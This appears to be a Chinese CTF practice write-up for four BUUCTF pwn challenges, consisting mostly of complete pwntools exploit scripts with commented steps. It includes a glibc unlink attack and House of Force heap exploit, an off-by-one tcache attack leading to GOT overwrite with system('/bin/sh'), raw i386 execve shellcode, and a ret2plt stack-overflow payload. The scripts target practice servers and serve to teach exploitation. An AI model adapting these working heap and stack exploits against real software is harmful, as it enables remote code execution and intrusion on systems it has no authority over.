PWN-PRACTICE-BUUCTF-19
- hitcontraining_bamboobox
- picoctf_2018_shellcode
- npuctf_2020_easyheap
- cmcc_pwnme2
hitcontraining_bamboobox
unlink,参考:hitcontraining_bamboobox 堆技巧 unlink
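# -*- coding:utf-8 -*-
"""hitcontraining_bamboobox -- unlink attack (glibc 2.23, non-PIE binary).

What the script below does, step by step:
  1. Build a fake free chunk inside item 0 whose fd/bk point just before the
     global item-table slot `ptr` (fd = ptr-0x18, bk = ptr-0x10), so glibc's
     unlink() check `P->fd->bk == P && P->bk->fd == P` is satisfied.
  2. Overflow from item 0 into item 1's chunk header (prev_size = 0x40,
     size = 0x90 with PREV_INUSE clear) and free item 1: backward
     consolidation unlinks the fake chunk and stores ptr-0x18 into ptr.
  3. Item 0 now "lives" inside the item table, so an edit of item 0 rewrites
     the table: item 0's name pointer becomes atoi@got. show() leaks it,
     a second edit overwrites atoi@got with system.
  4. Send "/bin/sh" as the menu choice; the menu parses it with atoi(),
     which is now system("/bin/sh").

All I/O uses byte literals so the script runs on Python 3 pwntools
(io.recv() returns bytes and bytes.ljust() needs a bytes fill); on Python 2
the same literals are plain str. Addresses and libc offsets are specific to
this challenge binary and to the bundled libc-2.23-16-x64.so.
"""
from pwn import *

# io = process("./bamboobox")
io = remote("node4.buuoj.cn", 29339)  # BUUCTF practice instance; the port changes on every spawn
elf = ELF("./bamboobox")
libc = ELF("./libc-2.23-16-x64.so")  # symbol offsets below are only valid for this exact libc


def show():
    """Menu 1: list every item as ``<index> : <name>``."""
    io.sendlineafter(b"Your choice:", b"1")


def add(name_len, name):
    """Menu 2: allocate an item of `name_len` bytes and fill it with `name`."""
    io.sendlineafter(b"Your choice:", b"2")
    io.sendlineafter(b"the length of item name:", str(name_len).encode())
    io.sendlineafter(b"the name of item:", name)


def edit(index, name_len, name):
    """Menu 3: write `name_len` bytes of `name` into item `index`.

    The exploit relies on the target accepting a `name_len` larger than the
    item's allocation (a 0x50-byte write into the 0x40-byte item 0 below);
    that is the heap overflow.
    """
    io.sendlineafter(b"Your choice:", b"3")
    io.sendlineafter(b"the index of item:", str(index).encode())
    io.sendlineafter(b"the length of item name:", str(name_len).encode())
    io.sendlineafter(b"the new name of the item:", name)


def free(index):
    """Menu 4: free item `index`."""
    io.sendlineafter(b"Your choice:", b"4")
    io.sendlineafter(b"the index of item:", str(index).encode())


def exit():  # shadows the builtin exit(); unused here, kept for parity with the other scripts
    """Menu 5: leave the program."""
    io.sendlineafter(b"Your choice:", b"5")


# gdb.attach(io)
# pause()
add(0x40, b"aaaa")  # item 0 (0x50 chunk): hosts the fake chunk
add(0x80, b"bbbb")  # item 1 (0x90 chunk, above the fastbin range): the chunk we free
add(0x80, b"cccc")  # item 2: keeps item 1 from bordering the top chunk

# Address of item 0's name pointer in the global item table (non-PIE binary).
ptr = 0x00000000006020C8
fd = ptr - 0x18  # fake->fd->bk == fake   (bk lives at +0x18 of a chunk)
bk = ptr - 0x10  # fake->bk->fd == fake   (fd lives at +0x10 of a chunk)

# Fake chunk header (prev_size 0, size 0x40, fd, bk), padded to 0x40 so the
# trailing 16 bytes land on item 1's header: prev_size = 0x40 (distance back
# to the fake chunk) and size = 0x90 with PREV_INUSE clear.
payload = p64(0) + p64(0x40) + p64(fd) + p64(bk)
payload = payload.ljust(0x40, b"A")
payload += p64(0x40) + p64(0x90)
edit(0, len(payload), payload)  # heap overflow into item 1's chunk header
# pause()
free(1)  # backward consolidation -> unlink(fake) -> *ptr = ptr - 0x18
# pause()

# Item 0's pointer now equals ptr-0x18, i.e. it points into the item table.
# Writing through it: the 8 bytes before `ptr` get 0x40 (presumably item 0's
# length field) and `ptr` itself gets atoi@got.
atoi_got = elf.got["atoi"]
payload = p64(0) * 2 + p64(0x40) + p64(atoi_got)
edit(0, len(payload), payload)
# pause()
show()
io.recvuntil(b"0 : ")
atoi_addr = u64(io.recv(6).ljust(8, b"\x00"))  # 6 significant bytes of a 64-bit userland pointer
print("atoi_addr==" + hex(atoi_addr))
libc_base = atoi_addr - libc.sym["atoi"]
system = libc_base + libc.sym["system"]
# pause()
edit(0, 0x08, p64(system))  # item 0 *is* atoi@got now -> GOT overwrite
# pause()
# The menu reads the choice with atoi(); atoi is now system.
io.sendlineafter(b"Your choice:", b"/bin/sh\x00")
io.interactive()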
House of Force,参考:hitcontraining_bamboobox 堆技巧 House of Force
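# -*- coding:utf-8 -*-
"""hitcontraining_bamboobox -- House of Force (glibc 2.23, non-PIE binary).

What the script below does, step by step:
  1. Overflow from item 0 into the top chunk header and set its size to
     0xffffffffffffffff, so any request is served from the top chunk.
  2. Request a "negative" size (offset = -0x70): malloc rounds that to a
     chunk size of -0x60 and moves the top pointer 0x60 bytes backwards,
     past item 0's 0x40 chunk to the 0x20 chunk allocated before it
     (presumably a pair of function pointers that the menu's exit path
     calls -- confirm in the binary).
  3. The next add(0x10) is served from that location and overwrites both
     slots with `magic`; leaving via menu 5 then jumps to `magic`.

Only relative heap distances are used, so heap ASLR does not matter; `magic`
is a fixed address because the binary is not PIE. This script targets a local
process by default -- the remote line is commented out and its port must be
refreshed from BUUCTF before use. Byte literals keep it valid on Python 3
pwntools.
"""
from pwn import *

context.log_level = "debug"
io = process("./bamboobox")
# io = remote("node4.buuoj.cn", 26168)
elf = ELF("./bamboobox")
libc = ELF("./libc-2.23-16-x64.so")  # not needed on this path; kept for parity with the unlink script


def show():
    """Menu 1: list every item as ``<index> : <name>``."""
    io.sendlineafter(b"Your choice:", b"1")


def add(name_len, name):
    """Menu 2: allocate an item of `name_len` bytes and fill it with `name`."""
    io.sendlineafter(b"Your choice:", b"2")
    io.sendlineafter(b"the length of item name:", str(name_len).encode())
    io.sendlineafter(b"the name of item:", name)


def edit(index, name_len, name):
    """Menu 3: write `name_len` bytes of `name` into item `index`.

    The target accepts a `name_len` larger than the item's allocation
    (a 0x40-byte write into the 0x30-byte item 0 below); that overflow is
    what reaches the top chunk header.
    """
    io.sendlineafter(b"Your choice:", b"3")
    io.sendlineafter(b"the index of item:", str(index).encode())
    io.sendlineafter(b"the length of item name:", str(name_len).encode())
    io.sendlineafter(b"the new name of the item:", name)


def free(index):
    """Menu 4: free item `index`."""
    io.sendlineafter(b"Your choice:", b"4")
    io.sendlineafter(b"the index of item:", str(index).encode())


def exit():  # shadows the builtin exit(); this is the menu's quit option, which triggers the hijacked pointer
    """Menu 5: leave the program."""
    io.sendlineafter(b"Your choice:", b"5")


# gdb.attach(io)
# pause()
add(0x30, b"aaaa")  # item 0: 0x40 chunk sitting directly below the top chunk

# 0x30 bytes of item data, then the top chunk's prev_size (0) and its size.
payload = b"a" * 0x30 + p64(0) + p64(0xffffffffffffffff)
edit(0, len(payload), payload)  # heap overflow into the top chunk header
# pause()

# House of Force: a huge top size lets a negative request move `top` backwards.
offset = 0x000 - 0x060 - 0x10
add(offset, b"bbbb")  # move the top chunk
# pause()

magic = 0x0000000000400D49  # address inside the non-PIE binary, presumably the backdoor/flag function -- verify
add(0x10, p64(magic) * 2)  # this allocation now overlaps the target object; both slots := magic
# pause()
exit()  # menu 5 -> the overwritten pointer is called
# pause()
io.interactive()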
picoctf_2018_shellcode
32位elf,静态编译,保护几乎全都没开
main函数中有条call eax的gadget,eax保存的是输入的起始地址,于是输入shellcode即可执行
"""picoctf_2018_shellcode: the program calls eax with eax pointing at the
start of our input, so the input only has to be a 32-bit execve shellcode."""
from pwn import *

# io = process('./PicoCTF_2018_shellcode')
io = remote('node4.buuoj.cn', 27908)
elf = ELF('PicoCTF_2018_shellcode')

# execve("//bin/sh", NULL, NULL) on i386:
#   ecx = edx = 0          -> argv = envp = NULL
#   push 0; "n/sh"; "//bi" -> NUL-terminated "//bin/sh" on the stack
#   ebx = esp; eax = 0xb   -> filename pointer, execve syscall number
SHELLCODE_ASM = (
    'xor ecx,ecx;'
    'xor edx,edx;'
    'push edx;'
    'push 0x68732f6e;'
    'push 0x69622f2f ;'
    'mov ebx,esp;'
    'mov eax,0xb;'
    'int 0x80'
)

io.recvuntil('Enter a string!\n')
io.sendline(asm(SHELLCODE_ASM))  # assembled for the default i386 context
io.interactive()
npuctf_2020_easyheap
off-by-one (obo),参考:npuctf_2020_easyheap
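# -*- coding:utf-8 -*-
"""npuctf_2020_easyheap -- off-by-one on glibc 2.27 (tcache).

What the script below does, step by step (heap layout inferred from the
payloads; confirm against the binary):
  1. Create three 0x18-byte items; item 2 holds "/bin/sh".
  2. edit(0) writes one byte past item 0, changing the size field of the
     next chunk from 0x21 to 0x41.
  3. free(1) parks that now-0x40 chunk in tcache; add(0x38) gets it back,
     and because it overlaps the 0x20 chunk that malloc just reused as the
     new item-1 record, the payload rebuilds that chunk's header (0, 0x21)
     and sets the record to (size=8, ptr=free@got).
  4. show(1) leaks free@libc, edit(1) writes system over free@got, and
     free(2) becomes system("/bin/sh").

Byte literals keep the script valid on Python 3 pwntools (recvuntil()
returns bytes; bytes.ljust() needs a bytes fill). Libc offsets are only
valid for the bundled libc-2.27-18-x64.so.
"""
from pwn import *

# io = process("./npuctf_2020_easyheap")
io = remote("node4.buuoj.cn", 25100)  # BUUCTF practice instance; the port changes on every spawn
elf = ELF("./npuctf_2020_easyheap")
libc = ELF("./libc-2.27-18-x64.so")


def add(size, content):
    """Menu 1: allocate `size` bytes and fill them with `content`.

    The prompt advertises 0x10/0x20 only, yet the 0x38 request below is
    accepted by the target; whatever check exists does not stop it.
    """
    io.sendlineafter(b"Your choice :", b"1")
    io.sendlineafter(b"Size of Heap(0x10 or 0x20 only) : ", str(size).encode())
    io.sendlineafter(b"Content:", content)


def edit(index, content):
    """Menu 2: overwrite item `index` with `content` (one byte too many is allowed)."""
    io.sendlineafter(b"Your choice :", b"2")
    io.sendlineafter(b"Index :", str(index).encode())
    io.sendlineafter(b"Content: ", content)


def show(index):
    """Menu 3: print ``Content : <data>`` for item `index`."""
    io.sendlineafter(b"Your choice :", b"3")
    io.sendlineafter(b"Index :", str(index).encode())


def free(index):
    """Menu 4: free item `index`."""
    io.sendlineafter(b"Your choice :", b"4")
    io.sendlineafter(b"Index :", str(index).encode())


def exit():  # shadows the builtin exit(); unused here, kept for parity with the other scripts
    """Menu 5: leave the program."""
    io.sendlineafter(b"Your choice :", b"5")


# gdb.attach(io)
# pause()
add(0x18, b"aaaa")        # 0
add(0x18, b"bbbb")        # 1
add(0x18, b"/bin/sh\x00")  # 2: argument for the final free() -> system()
# pause()

# Off-by-one: the byte after item 0's 0x18 bytes is the next chunk's size.
payload = b"a" * 0x18 + p64(0x41)
edit(0, payload)
# pause()
free(1)  # the 0x41-sized chunk goes into the tcache 0x40 bin
# pause()

# Reclaim it with a 0x38 request: the data region now spans the following
# chunk too, so rebuild that chunk's header and plant (8, free@got) as the
# new item-1 record.
payload = b"a" * 0x10 + p64(0) + p64(0x21) + p64(8) + p64(elf.got["free"])
add(0x38, payload)
# pause()
show(1)
io.recvuntil(b"Content : ")
free_addr = u64(io.recvuntil(b"\n")[:-1].ljust(8, b"\x00"))
print("free_addr==" + hex(free_addr))
libc_base = free_addr - libc.sym["free"]
system = libc_base + libc.sym["system"]
print("system==" + hex(system))
# pause()
edit(1, p64(system))  # item 1 points at free@got -> GOT overwrite
free(2)               # free("/bin/sh") is now system("/bin/sh")
# pause()
io.interactive()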
cmcc_pwnme2
栈溢出 (ret2plt: 覆盖返回地址调用 gets@plt,把第二次输入写到固定地址 string_addr,再返回到 exec_str)
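"""cmcc_pwnme2 -- stack overflow, ret2plt.

The first input overflows the stack buffer and returns into gets@plt with
`string_addr` as its argument and `exec_str` as its return address. The
second line we send is what gets() stores at `string_addr`. What `exec_str`
then does with that address is not visible here -- check the disassembly.

Byte literals are required: on Python 3 ``'a' * n + p32(...)`` is str + bytes
and raises TypeError, so the original payload only worked on Python 2.
"""
from pwn import *

# io = process('./cmcc_pwnme2')
io = remote('node4.buuoj.cn', 29405)  # BUUCTF practice instance; the port changes on every spawn
elf = ELF('./cmcc_pwnme2')

gets_plt = elf.plt['gets']
string_addr = 0x0804A060  # fixed writable address in the non-PIE binary; receives the second input
exec_str = 0x080485CB     # address in the binary that gets() returns into

io.recvuntil(b'Please input:\n')
# 0x6c bytes up to the saved ebp + 4 bytes of saved ebp, then the return
# address: gets(string_addr), returning into exec_str.
payload = b'a' * (0x6c + 4) + p32(gets_plt) + p32(exec_str) + p32(string_addr)
io.sendline(payload)
io.sendline(b'./flag')  # consumed by gets() and stored at string_addr
io.interactive()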